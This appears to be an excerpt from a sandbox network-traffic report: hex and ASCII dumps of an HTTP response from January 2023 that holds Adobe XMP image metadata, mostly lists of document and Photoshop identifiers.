                                                                                                                                                                                    Data Ascii: 2C712C6DB9229E82053E</rdf:li> <rdf:li>5072F7A053E5BC5478C7869CD16BA55B</rdf:li> <rdf:li>5076ECE7465DE1BAC58ED841C626FF56</rdf:li> <rdf:li>50784F133B85A7F71C80AC5461CDC867</rdf:li> <rdf:li>507FCBD790E2710522BA25F878183D60</rdf:li> <rdf:li>5087E771A9F82729D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3277INData Raw: 36 39 43 38 45 39 36 41 46 35 33 44 46 31 36 37 39 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 37 32 36 33 34 32 46 37 42 46 36 39 45 43 42 41 31 41 33 30 42 30 44 31 43 30 39 35 42 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 37 33 45 46 35 41 39 34 42 38 39 39 36 32 37 34 41 41 31 42 46 38 38 33 33 30 35 39 44 42 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 37 34 44 35 34 43 43 38 32 31 35 39 34 35 45 46 42 36 46 43 32 37 30 34 36 45 30 35 46 44 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 37 35 31 38 44 41 39 32 37 43 37 42 34 46 42 38 34 39 46 34 34 44 36 42 45 38 35 42 39 44 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 37 35 35 46 36 31 37 33 31 42 36 41 37 32 39 36 36 45
                                                                                                                                                                                    Data Ascii: 69C8E96AF53DF1679F</rdf:li> <rdf:li>5726342F7BF69ECBA1A30B0D1C095B44</rdf:li> <rdf:li>573EF5A94B8996274AA1BF8833059DBF</rdf:li> <rdf:li>574D54CC8215945EFB6FC27046E05FD1</rdf:li> <rdf:li>57518DA927C7B4FB849F44D6BE85B9D2</rdf:li> <rdf:li>5755F61731B6A72966E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3293INData Raw: 38 46 39 45 33 37 31 34 31 44 38 42 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 36 33 37 37 34 36 34 43 36 32 34 43 30 38 44 34 45 41 39 36 30 35 38 31 30 32 31 42 46 34 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 36 33 45 45 30 46 37 46 45 39 45 38 42 43 33 35 41 46 38 38 32 38 42 39 34 43 37 44 36 36 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 36 34 33 32 44 45 38 38 45 30 36 34 43 39 35 45 39 44 37 31 34 41 35 45 44 33 33 30 38 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 36 34 44 38 46 45 30 34 38 32 45 43 33 30 33 42 37 36 44 43 30 44 45 44 35 38 31 45 44 30 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 36 35 35 46 36 32 46 30 30 33 34 30 39 43 31 42 30 42 38 42 35 42 38
                                                                                                                                                                                    Data Ascii: 8F9E37141D8B4</rdf:li> <rdf:li>66377464C624C08D4EA960581021BF4B</rdf:li> <rdf:li>663EE0F7FE9E8BC35AF8828B94C7D66D</rdf:li> <rdf:li>66432DE88E064C95E9D714A5ED330815</rdf:li> <rdf:li>664D8FE0482EC303B76DC0DED581ED08</rdf:li> <rdf:li>6655F62F003409C1B0B8B5B8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3309INData Raw: 33 35 44 46 36 36 45 30 45 36 46 31 32 41 32 42 37 46 42 43 41 32 33 42 39 43 33 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 37 36 39 43 35 33 45 34 38 30 41 32 30 43 41 45 44 43 36 38 30 34 32 33 36 41 36 33 41 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 37 38 30 33 34 38 46 39 34 37 30 46 38 36 32 42 43 44 44 41 38 43 44 32 39 35 43 44 35 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 38 37 42 34 35 37 43 43 32 41 46 31 43 46 30 42 32 43 38 44 31 34 42 37 46 42 37 30 33 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 38 39 33 33 41 45 44 38 44 34 36 31 45 31 41 31 38 33 44 30 35 34 42 32 30 30 34 39 46 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 34 39 30 34 36 31 35
                                                                                                                                                                                    Data Ascii: 35DF66E0E6F12A2B7FBCA23B9C38F</rdf:li> <rdf:li>74769C53E480A20CAEDC6804236A63AF</rdf:li> <rdf:li>74780348F9470F862BCDDA8CD295CD5F</rdf:li> <rdf:li>7487B457CC2AF1CF0B2C8D14B7FB7038</rdf:li> <rdf:li>748933AED8D461E1A183D054B20049F2</rdf:li> <rdf:li>74904615
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3317INData Raw: 41 33 33 33 33 31 35 32 44 45 30 33 30 30 44 41 37 38 36 45 44 37 33 36 38 38 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 41 36 37 36 44 45 30 46 33 36 33 44 31 46 37 31 37 38 41 31 46 41 46 41 33 32 35 41 35 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 41 36 41 42 32 46 41 43 36 43 41 42 30 34 37 33 42 35 43 43 43 43 37 36 41 33 44 45 39 30 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 41 36 43 43 44 39 43 38 33 41 31 36 39 44 38 33 42 35 36 30 31 34 36 37 34 43 33 42 39 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 41 36 45 36 31 34 33 41 38 41 46 41 41 41 34 32 34 42 32 44 38 35 30 32 34 34 34 32 46 30 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 41 38 35 32 42 35 44 46 45
                                                                                                                                                                                    Data Ascii: A3333152DE0300DA786ED73688D</rdf:li> <rdf:li>7A676DE0F363D1F7178A1FAFA325A52F</rdf:li> <rdf:li>7A6AB2FAC6CAB0473B5CCCC76A3DE902</rdf:li> <rdf:li>7A6CCD9C83A169D83B56014674C3B973</rdf:li> <rdf:li>7A6E6143A8AFAAA424B2D85024442F08</rdf:li> <rdf:li>7A852B5DFE
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3357INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 37 38 41 33 46 42 30 37 30 32 46 44 37 42 46 31 41 43 41 33 32 44 46 46 44 36 36 41 38 41 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 37 39 30 42 41 31 41 33 39 44 33 33 36 43 38 33 33 44 45 46 44 46 41 37 30 34 46 38 30 42 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 37 39 31 41 36 33 43 36 42 34 42 34 43 38 39 31 30 45 41 41 39 37 43 39 39 41 44 35 39 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 37 43 36 30 31 39 33 46 41 38 46 34 44 39 30 44 35 31 34 41 32 30 36 42 32 37 31 42 31 41 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 37 44 31 46 39 35 30 39 41 35 30 36 36 45 32 32 30 37 37 37 46 42 32 31 33 35 42 41 30 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: i> <rdf:li>878A3FB0702FD7BF1ACA32DFFD66A8A9</rdf:li> <rdf:li>8790BA1A39D336C833DEFDFA704F80B3</rdf:li> <rdf:li>8791A63C6B4B4C8910EAA97C99AD5932</rdf:li> <rdf:li>87C60193FA8F4D90D514A206B271B1AA</rdf:li> <rdf:li>87D1F9509A5066E220777FB2135BA03D</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3389INData Raw: 33 31 43 34 38 46 42 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 35 46 33 37 36 41 44 32 35 34 39 33 31 33 35 33 34 38 42 39 42 39 31 36 41 35 34 32 39 35 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 36 32 39 32 45 46 32 45 44 37 43 32 30 34 32 42 46 45 31 45 46 34 38 36 35 45 44 39 32 39 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 36 33 44 36 41 34 35 37 34 31 36 30 35 31 45 41 38 45 41 42 37 41 31 46 44 37 34 32 46 46 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 36 33 46 46 36 32 30 39 31 43 42 36 43 43 37 35 33 35 43 39 34 41 41 42 30 43 45 45 39 36 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 36 34 30 32 41 31 42 41 44 30 37 41 44 42 42 36 35 45 35 37 33 37 34 46 36 41 41
                                                                                                                                                                                    Data Ascii: 31C48FB2C</rdf:li> <rdf:li>95F376AD25493135348B9B916A542956</rdf:li> <rdf:li>96292EF2ED7C2042BFE1EF4865ED9292</rdf:li> <rdf:li>963D6A457416051EA8EAB7A1FD742FF5</rdf:li> <rdf:li>963FF62091CB6CC7535C94AAB0CEE96A</rdf:li> <rdf:li>96402A1BAD07ADBB65E57374F6AA
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3418INData Raw: 35 39 45 30 36 34 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 43 ff e1 ff c5 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 6d 70 2f 65 78 74 65 6e 73 69 6f 6e 2f 00 46 42 38 30 36 46 32 36 41 46 41 37 31 34 37 34 37 32 45 33 37 31 33 38 45 39 36 42 45 41 46 31 00 10 2c c0 00 06 fc 48 39 30 41 33 30 32 46 39 31 30 38 36 31 46 45 41 34 36 34 38 46 36 35 36 39 37 34 44 45 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 43 39 34 32 43 34 32 36 36 42 37 45 46 35 32 30 34 35 45 44 43 42 43 42 36 39 33 42 39 38 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 43 41 34 44 34 43 41 37 33 46 45 43 34 32 42 34 43 41 33 46 36 31 35 44 31 32 32 41 37 36 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39
                                                                                                                                                                                    Data Ascii: 59E0645</rdf:li> <rdf:li>9Chttp://ns.adobe.com/xmp/extension/FB806F26AFA7147472E37138E96BEAF1,H90A302F910861FEA4648F656974DE1</rdf:li> <rdf:li>9C942C4266B7EF52045EDCBCB693B98E</rdf:li> <rdf:li>9CA4D4CA73FEC42B4CA3F615D122A76D</rdf:li> <rdf:li>9
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3482INData Raw: 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 45 32 38 32 33 31 38 32 43 36 45 41 33 42 45 44 36 38 43 38 43 46 31 36 43 37 34 45 42 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 45 39 35 37 36 31 31 43 36 46 32 38 37 36 34 32 34 45 46 46 44 41 41 38 38 32 45 32 39 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 45 39 45 43 39 30 30 35 30 42 36 41 34 44 32 31 45 39 42 44 43 41 41 32 31 45 44 34 44 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 45 43 44 31 41 34 46 36 39 35 30 32 43 35 32 35 44 42 31 32 37 46 42 30 37 42 44 46 39 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 39 46 31 31 32 30 46 39 35 44 36 33 44 44 35 39 30 32 45 31 42 41 43 33 41 31 46 38 32 45 44 3c 2f 72
                                                                                                                                                                                    Data Ascii: 9A</rdf:li> <rdf:li>A9E2823182C6EA3BED68C8CF16C74EB8</rdf:li> <rdf:li>A9E957611C6F2876424EFFDAA882E291</rdf:li> <rdf:li>A9E9EC90050B6A4D21E9BDCAA21ED4DB</rdf:li> <rdf:li>A9ECD1A4F69502C525DB127FB07BDF9C</rdf:li> <rdf:li>A9F1120F95D63DD5902E1BAC3A1F82ED</r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3522INData Raw: 44 38 41 35 45 33 30 45 43 34 44 34 42 30 42 42 43 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 37 33 34 39 38 46 43 45 37 37 46 43 32 45 44 44 38 46 38 34 37 31 38 30 42 33 32 42 42 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 37 33 44 33 45 37 38 37 35 31 38 30 38 43 33 44 39 39 30 35 33 33 44 38 33 32 45 38 44 31 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 37 33 44 38 30 39 37 37 42 43 46 39 44 34 34 30 43 39 32 43 45 31 42 44 35 38 31 46 43 35 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 37 36 42 30 37 30 32 44 44 44 41 37 41 46 46 36 32 39 34 31 43 36 36 45 33 36 34 31 31 31 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 37 37 35 37 45 39 34 31 38 35 37 31 30 37 36 45 36 39
                                                                                                                                                                                    Data Ascii: D8A5E30EC4D4B0BBCE</rdf:li> <rdf:li>B73498FCE77FC2EDD8F847180B32BB24</rdf:li> <rdf:li>B73D3E78751808C3D990533D832E8D10</rdf:li> <rdf:li>B73D80977BCF9D440C92CE1BD581FC53</rdf:li> <rdf:li>B76B0702DDDA7AFF62941C66E3641116</rdf:li> <rdf:li>B7757E9418571076E69
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3530INData Raw: 39 33 30 35 31 35 35 33 39 41 31 36 35 41 35 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 45 31 33 34 33 38 38 39 45 35 35 43 35 36 36 43 36 45 36 35 31 35 34 34 42 45 42 35 39 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 45 31 38 38 41 39 46 46 35 37 44 34 30 44 34 35 41 46 42 41 34 43 46 32 42 33 38 33 30 43 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 45 32 33 32 44 44 44 46 32 39 37 37 43 46 38 44 42 44 33 38 34 42 37 32 36 30 46 38 46 30 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 45 33 37 41 38 45 41 39 30 46 43 42 30 33 32 43 32 33 44 34 41 32 30 43 36 44 32 31 42 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 45 34 32 44 35 44 44 38 32 42 37 39 37 46 43 36 41 37 45 44
                                                                                                                                                                                    Data Ascii: 930515539A165A51</rdf:li> <rdf:li>BE1343889E55C566C6E651544BEB5982</rdf:li> <rdf:li>BE188A9FF57D40D45AFBA4CF2B3830CE</rdf:li> <rdf:li>BE232DDDF2977CF8DBD384B7260F8F0B</rdf:li> <rdf:li>BE37A8EA90FCB032C23D4A20C6D21B63</rdf:li> <rdf:li>BE42D5DD82B797FC6A7ED
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3555INData Raw: 42 46 38 30 46 34 46 33 34 44 32 43 41 39 32 39 46 30 37 30 42 32 44 41 37 43 39 38 43 37 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 38 41 39 41 37 30 33 43 33 41 42 43 32 38 35 41 43 37 42 44 39 35 45 46 39 43 34 37 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 38 45 37 45 46 41 41 33 46 44 43 44 38 33 38 32 37 37 43 45 42 38 32 36 33 46 43 39 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 39 31 44 38 36 45 36 36 42 33 37 38 41 42 45 43 45 39 41 44 39 42 32 37 44 45 32 42 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 39 42 42 35 31 31 44 38 43 32 39 34 43 43 42 44 45 33 43 30 37 46 46 32 36 42 31 33 33 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 41 35 45
                                                                                                                                                                                    Data Ascii: BF80F4F34D2CA929F070B2DA7C98C78F</rdf:li> <rdf:li>BF8A9A703C3ABC285AC7BD95EF9C4787</rdf:li> <rdf:li>BF8E7EFAA3FDCD838277CEB8263FC9A5</rdf:li> <rdf:li>BF91D86E66B378ABECE9AD9B27DE2B03</rdf:li> <rdf:li>BF9BB511D8C294CCBDE3C07FF26B133C</rdf:li> <rdf:li>BFA5E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3595INData Raw: 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 43 43 44 37 36 45 35 35 31 31 46 32 46 45 44 42 33 44 37 36 43 32 36 43 34 30 43 35 44 41 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 43 44 30 44 37 36 37 35 45 32 43 34 34 38 39 35 37 38 43 44 45 35 35 44 31 45 43 35 39 36 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 43 45 35 32 38 31 31 34 34 44 38 39 39 37 36 32 33 33 33 37 44 38 45 33 31 32 39 45 43 34 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 43 45 36 37 43 33 33 38 44 32 32 34 31 43 42 38 37 37 37 42 31 32 43 37 42 37 42 37 36 42 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 43 46 39 32 44 31 34 44 45 42 34 36 33 32 44 46 35 34 41 41 43 42 35 39 43 44 45 31 38 39 37 3c 2f 72 64 66 3a 6c
                                                                                                                                                                                    Data Ascii: rdf:li> <rdf:li>CCCD76E5511F2FEDB3D76C26C40C5DAB</rdf:li> <rdf:li>CCD0D7675E2C4489578CDE55D1EC596A</rdf:li> <rdf:li>CCE5281144D8997623337D8E3129EC40</rdf:li> <rdf:li>CCE67C338D2241CB8777B12C7B7B76BB</rdf:li> <rdf:li>CCF92D14DEB4632DF54AACB59CDE1897</rdf:l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3611INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 33 37 41 32 37 39 42 32 31 46 39 41 32 31 46 35 41 32 31 42 45 38 35 46 37 32 43 30 31 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 35 30 34 39 45 42 38 31 41 39 45 43 35 31 38 33 44 35 41 34 42 46 33 35 30 41 32 30 33 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 35 34 43 33 35 32 38 30 39 45 35 30 32 44 34 46 36 42 33 43 43 34 30 43 34 37 35 34 43 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 36 33 42 35 37 36 35 43 44 42 35 43 31 44 42 46 42 33 32 45 32 35 41 37 35 31 46 36 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 41 37 46 38 37 45 38 31 42 45 41 41 38 46 33 37 35 32 38 42 43 35 44 31 44 43 30 39 43 38 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: i> <rdf:li>DA37A279B21F9A21F5A21BE85F72C014</rdf:li> <rdf:li>DA5049EB81A9EC5183D5A4BF350A2033</rdf:li> <rdf:li>DA54C352809E502D4F6B3CC40C4754C8</rdf:li> <rdf:li>DA63B5765CDB5C1DBFB32E25A751F6D7</rdf:li> <rdf:li>DA7F87E81BEAA8F37528BC5D1DC09C8D</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3665INData Raw: 31 44 36 38 31 31 35 30 30 39 43 46 31 30 30 36 32 43 32 45 38 39 44 44 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 46 41 39 36 36 46 38 31 43 35 41 45 32 36 39 30 43 45 30 46 32 44 31 33 35 32 33 35 31 30 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 46 41 46 38 42 42 37 30 31 42 34 38 43 38 37 34 45 34 46 30 36 42 38 30 39 39 32 42 42 43 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 46 42 45 35 30 31 41 32 39 46 36 33 38 43 30 34 38 42 45 42 39 41 39 42 46 36 30 34 44 45 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 46 43 33 32 43 45 43 35 46 45 44 44 38 34 36 31 46 46 45 36 31 30 43 41 46 37 34 38 33 33 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 46 43 46 33 36 39 46 35 37 43 32
                                                                                                                                                                                    Data Ascii: 1D68115009CF10062C2E89DDA</rdf:li> <rdf:li>DFA966F81C5AE2690CE0F2D135235100</rdf:li> <rdf:li>DFAF8BB701B48C874E4F06B80992BBC7</rdf:li> <rdf:li>DFBE501A29F638C048BEB9A9BF604DE5</rdf:li> <rdf:li>DFC32CEC5FEDD8461FFE610CAF748338</rdf:li> <rdf:li>DFCF369F57C2
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3745INData Raw: 20 3c 72 64 66 3a 6c 69 3e 45 42 45 31 45 39 36 36 35 44 45 35 30 37 43 41 33 39 32 35 33 43 32 46 30 30 31 37 42 36 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 42 46 34 32 43 33 43 32 42 34 31 38 31 32 33 45 46 36 46 33 46 30 38 39 39 39 32 30 31 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 30 35 34 30 36 34 33 32 39 32 43 46 30 32 43 39 36 33 43 30 30 31 37 41 34 37 42 42 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 31 41 43 36 34 41 39 43 37 37 46 43 38 45 42 38 44 38 32 39 33 33 41 36 33 31 37 33 36 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 43 33 31 45 46 38 36 46 46 37 45 33 39 34 42 43 38 33 30 35 45 30 33 36 37 42 41 42 41 31 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66
                                                                                                                                                                                    Data Ascii: <rdf:li>EBE1E9665DE507CA39253C2F0017B68F</rdf:li> <rdf:li>EBF42C3C2B418123EF6F3F08999201B2</rdf:li> <rdf:li>EC0540643292CF02C963C0017A47BB31</rdf:li> <rdf:li>EC1AC64A9C77FC8EB8D82933A631736F</rdf:li> <rdf:li>EC31EF86FF7E394BC8305E0367BABA1B</rdf:li> <rdf
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3761INData Raw: 44 32 30 46 44 39 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 38 41 42 42 42 35 34 46 42 35 32 46 36 30 41 43 30 33 43 37 35 41 42 44 34 39 46 44 35 39 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 38 41 44 31 42 34 34 44 36 43 41 31 33 46 39 45 34 31 31 36 30 43 43 41 46 36 32 38 41 44 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 38 42 44 38 31 39 35 34 45 44 32 36 45 35 30 38 33 41 31 36 45 44 45 30 31 37 41 39 32 32 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 38 44 35 32 38 45 45 38 34 30 34 34 46 43 31 32 41 46 44 30 44 44 32 31 41 35 30 36 35 38 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 38 44 36 35 38 46 31 43 45 34 35 36 35 43 45 43 44 45 35 46 36 38 30 31 43 37 42 34 34
                                                                                                                                                                                    Data Ascii: D20FD90</rdf:li> <rdf:li>F8ABBB54FB52F60AC03C75ABD49FD592</rdf:li> <rdf:li>F8AD1B44D6CA13F9E41160CCAF628ADD</rdf:li> <rdf:li>F8BD81954ED26E5083A16EDE017A9225</rdf:li> <rdf:li>F8D528EE84044FC12AFD0DD21A506581</rdf:li> <rdf:li>F8D658F1CE4565CECDE5F6801C7B44
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3800INData Raw: 37 34 43 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 46 37 45 31 35 46 31 30 42 44 39 37 45 38 38 35 31 38 31 46 38 44 34 30 33 33 35 38 39 39 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 46 38 43 42 30 39 35 41 42 31 33 46 44 41 31 35 33 39 32 41 36 34 31 45 43 42 45 41 44 30 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 46 38 44 46 32 31 31 46 46 36 33 32 31 42 32 45 35 32 39 33 42 30 39 38 36 34 31 39 42 42 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 46 41 35 42 38 43 37 32 46 31 46 37 42 46 41 33 31 38 33 35 33 34 46 43 43 42 32 32 41 30 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 46 41 36 38 34 39 31 35 35 39 31 43 44 34 33 39 30 45 41 46 31 45 37 35 45 41 42 45 41 36 44
                                                                                                                                                                                    Data Ascii: 74CD6</rdf:li> <rdf:li>FF7E15F10BD97E885181F8D403358993</rdf:li> <rdf:li>FF8CB095AB13FDA15392A641ECBEAD0F</rdf:li> <rdf:li>FF8DF211FF6321B2E5293B0986419BB6</rdf:li> <rdf:li>FFA5B8C72F1F7BFA3183534FCCB22A0A</rdf:li> <rdf:li>FFA684915591CD4390EAF1E75EABEA6D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3872INData Raw: 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 30 31 65 39 37 36 38 2d 65 38 36 65 2d 31 31 64 37 2d 39 35 63 34 2d 39 35 64 34 64 35 65 30 33 30 36 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 30 33 62 35 37 30 38 2d 30 61 63 64 2d 31 31 65 36 2d 38 62 64 30 2d 39 66 65 65 38 66 35 35 39 35 64 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 30 35 64 65 32 39 30 2d 31 30 66 35 2d 31 31 65 36 2d 62 34 39 63 2d 38 36 37 33 31 62 66 39 38 37 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f
                                                                                                                                                                                    Data Ascii: 4</rdf:li> <rdf:li>adobe:docid:photoshop:301e9768-e86e-11d7-95c4-95d4d5e03064</rdf:li> <rdf:li>adobe:docid:photoshop:303b5708-0acd-11e6-8bd0-9fee8f5595db</rdf:li> <rdf:li>adobe:docid:photoshop:305de290-10f5-11e6-b49c-86731bf98772</rdf:li> <rdf:li>adobe:do
